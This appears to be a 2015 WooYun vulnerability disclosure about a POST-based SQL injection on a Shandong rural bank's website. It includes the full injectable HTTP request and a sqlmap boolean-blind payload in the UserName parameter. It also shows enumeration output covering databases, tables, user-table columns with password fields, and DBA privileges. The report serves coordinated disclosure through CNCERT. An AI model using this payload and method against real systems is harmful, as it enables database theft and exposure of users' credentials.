当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143972

漏洞标题:山东省某银行官网POST型SQL注入导致大量敏感信息泄露(DBA权限)

相关厂商:tengzhou.gov.cn

漏洞作者: 路人甲

提交时间:2015-09-28 21:27

修复时间:2015-11-15 16:22

公开时间:2015-11-15 16:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-28: 细节已通知厂商并且等待厂商处理中
2015-10-01: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-11: 细节向核心白帽子及相关领域专家公开
2015-10-21: 细节向普通白帽子公开
2015-10-31: 细节向实习白帽子公开
2015-11-15: 细节向公众公开

简要描述:

SQL注入导致银行数据可被拖库。

详细说明:

山东省滕州农商银行官网存在POST型SQL注入,使得银行数据可被拖库泄露敏感数据。

漏洞证明:

滕州农商行官网地址:http://**.**.**.**/

1滕州主页.png


经过测试,提交如下POST数据,参数UserName存在注入:

POST /wcm/user/add_newuser.jsp HTTP/1.1
Content-Length: 265
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**
Cookie: JSESSIONID=WH3T1BfR4InOfw14O1YVylbXy1tYfL8f2B6fkC4akEBvouITd7g5!1370318643
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Address=3137%20Laguna%20Street&Email=sample%40email.tst&GroupId=0&GroupIds=1&Mobile=987-65-4329&NickName=pengfaxa&Password=g00dPa%24%24w0rD&ReminderAnswer=1&ReminderQuestion=1&Tel=1&TrueName=omcklhve&UserName=qthdqrpf


数据库是Microsoft SQL Server 2000

sqlmap identified the following injection points with a total of 121 HTTP(s) requests:
---
Place: POST
Parameter: UserName
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Address=3137 Laguna Street&[email protected]&GroupId=0&GroupIds=1&Mobile=987-65-4329&NickName=pengfaxa&Password=g00dPa$$w0rD&ReminderAnswer=1&ReminderQuestion=1&Tel=1&TrueName=omcklhve&UserName=qthdqrpf' AND 3*2*1=6 AND '000xyfX'='000xyfX' AND 2621=2621 AND 'Wpwg'='Wpwg
---
web server operating system: Windows
web application technology: Apache 2.0.59
back-end DBMS: Microsoft SQL Server 2000


一共包含7个数据库:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: UserName
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Address=3137 Laguna Street&[email protected]&GroupId=0&GroupIds=1&Mobile=987-65-4329&NickName=pengfaxa&Password=g00dPa$$w0rD&ReminderAnswer=1&ReminderQuestion=1&Tel=1&TrueName=omcklhve&UserName=qthdqrpf' AND 3*2*1=6 AND '000xyfX'='000xyfX' AND 2621=2621 AND 'Wpwg'='Wpwg
---
web server operating system: Windows
web application technology: Apache 2.0.59
back-end DBMS: Microsoft SQL Server 2000
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] TRSWCM


current-db是TRSWCM,一共包含85表:

web server operating system: Windows
web application technology: Apache 2.0.59
back-end DBMS: Microsoft SQL Server 2000
current database: 'TRSWCM'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: UserName
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Address=3137 Laguna Street&[email protected]&GroupId=0&GroupIds=1&Mobile=987-65-4329&NickName=pengfaxa&Password=g00dPa$$w0rD&ReminderAnswer=1&ReminderQuestion=1&Tel=1&TrueName=omcklhve&UserName=qthdqrpf' AND 3*2*1=6 AND '000xyfX'='000xyfX' AND 2621=2621 AND 'Wpwg'='Wpwg
---
web server operating system: Windows
web application technology: Apache 2.0.59
back-end DBMS: Microsoft SQL Server 2000
Database: TRSWCM
[85 tables]
+---------------------+
| WCMADDRESS |
| WCMADDRGROUP |
| WCMADDRGRPMAP |
| WCMAPPENDIX |
| WCMBOOKMARK |
| WCMBULLETIN |
| WCMCHANNEL |
| WCMCHANNELSYN |
| WCMCHNLDOC |
| WCMCHNLEXTFIELD |
| WCMCHNLFLOW |
| WCMCHNLTEMP |
| WCMCONFIG |
| WCMCONTACT |
| WCMCONTENTLINK |
| WCMCONTGROUP |
| WCMCONTGRPMAP |
| WCMDBUPDATE |
| WCMDOCBAK |
| WCMDOCKIND |
| WCMDOCREPLY |
| WCMDOCSYN |
| WCMDOCTYPE |
| WCMDOCUMENT |
| WCMEVENT |
| WCMEVENTTYPE |
| WCMEXCELDATA |
| WCMEXPIRATION |
| WCMEXTFIELD |
| WCMFILETYPE |
| WCMFLOW |
| WCMFLOWACTION |
| WCMFLOWBRANCH |
| WCMFLOWDOC |
| WCMFLOWDOCBAK |
| WCMFLOWMONOPER |
| WCMFLOWNODE |
| WCMFLOWNODEOPER |
| WCMFORMFIELDS |
| WCMFORMINFO |
| WCMGROUP |
| WCMGRPUSER |
| WCMHITSCOUNT |
| WCMID |
| WCMJOB |
| WCMLOG |
| WCMLOGTYPE |
| WCMMARKKIND |
| WCMMARKSHARE |
| WCMMEETINGCONT |
| WCMMEETINGROOM |
| WCMMEETINGUSER |
| WCMMESSAGE |
| WCMMSGQUEUE |
| WCMOBJTRIGGER |
| WCMOPER |
| WCMRELATION |
| WCMREPLACE |
| WCMRIGHT |
| WCMRIGHTDEF |
| WCMROLE |
| WCMROLEUSER |
| WCMSCHEDULE |
| WCMSECURITY |
| WCMSITEEXTFIELD |
| WCMSOURCE |
| WCMSTATUS |
| WCMTAGBEANS |
| WCMTASK |
| WCMTASKPOOL |
| WCMTEMPAPDREL |
| WCMTEMPAPPENDIX |
| WCMTEMPLATE |
| WCMTRUSTEEINFO |
| WCMUSER |
| WCMUSERSETTING |
| WCMWEBSITE |
| WCM_ViewCOLUMNS |
| X_TEMP |
| cx |
| dtproperties |
| pangolin_test_table |
| s3_tmp |
| sysconstraints |
| syssegments |
+---------------------+


当前用户buwenwcm是DBA权限

dba用户.png


WCMUSER表中包含用户名、密码邮箱等信息

web server operating system: Windows
web application technology: Apache 2.0.59
back-end DBMS: Microsoft SQL Server 2000
Database: TRSWCM
Table: WCMUSER
[24 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| ADDRESS | nvarchar |
| APPLYTIME | datetime |
| ATTRIBUTE | nvarchar |
| CRTIME | datetime |
| CRUSER | nvarchar |
| EMAIL | nvarchar |
| IFPUBMYINFO | tinyint |
| LOGINTIME | datetime |
| LOGINTIMES | int |
| LOGOUTTIME | datetime |
| MOBILE | nvarchar |
| MSGINTERVAL | smallint |
| NICKNAME | nvarchar |
| PASSWORD | nvarchar |
| PRICE | int |
| REGTIME | datetime |
| REMINDERANSWER | nvarchar |
| REMINDERQUESTION | nvarchar |
| STATUS | tinyint |
| TEL | nvarchar |
| TRUENAME | nvarchar |
| USERID | int |
| USERNAME | nvarchar |
| VIEWINTERVAL | smallint |
+------------------+----------+


简单跑了3个用户,示意下,包含用户名、密码邮箱等信息。

3个用户.png


Northwind数据库包含31表:

web server operating system: Windows
web application technology: JSP, Apache 2.0.59
back-end DBMS: Microsoft SQL Server 2000
Database: Northwind
[31 tables]
+--------------------------------+
| Categories |
| CustomerCustomerDemo |
| CustomerDemographics |
| Customers |
| EmployeeTerritories |
| Employees |
| Invoices |
| Orders |
| Products |
| Region |
| Shippers |
| Suppliers |
| Territories |
| Alphabetical list of products |
| Category Sales for 1997 |
| Current Product List |
| Customer and Suppliers by City |
| Order Details Extended |
| Order Details |
| Order Subtotals |
| Orders Qry |
| Product Sales for 1997 |
| Products Above Average Price |
| Products by Category |
| Quarterly Orders |
| Sales Totals by Amount |
| Sales by Category |
| Summary of Sales by Quarter |
| Summary of Sales by Year |
| sysconstraints |
| syssegments |
+--------------------------------+


pub数据库包含14表

web server operating system: Windows
web application technology: JSP, Apache 2.0.59
back-end DBMS: Microsoft SQL Server 2000
Database: pubs
[14 tables]
+----------------+
| authors |
| discounts |
| employee |
| jobs |
| pub_info |
| publishers |
| roysched |
| sales |
| stores |
| sysconstraints |
| syssegments |
| titleauthor |
| titles |
| titleview |
+----------------+


想看哪个数据库随便看,可拖库。
OK,问题证明到此。

修复方案:

过滤。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-01 16:20

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置,同时转由CNCERT发山东分中心。

最新状态:

暂无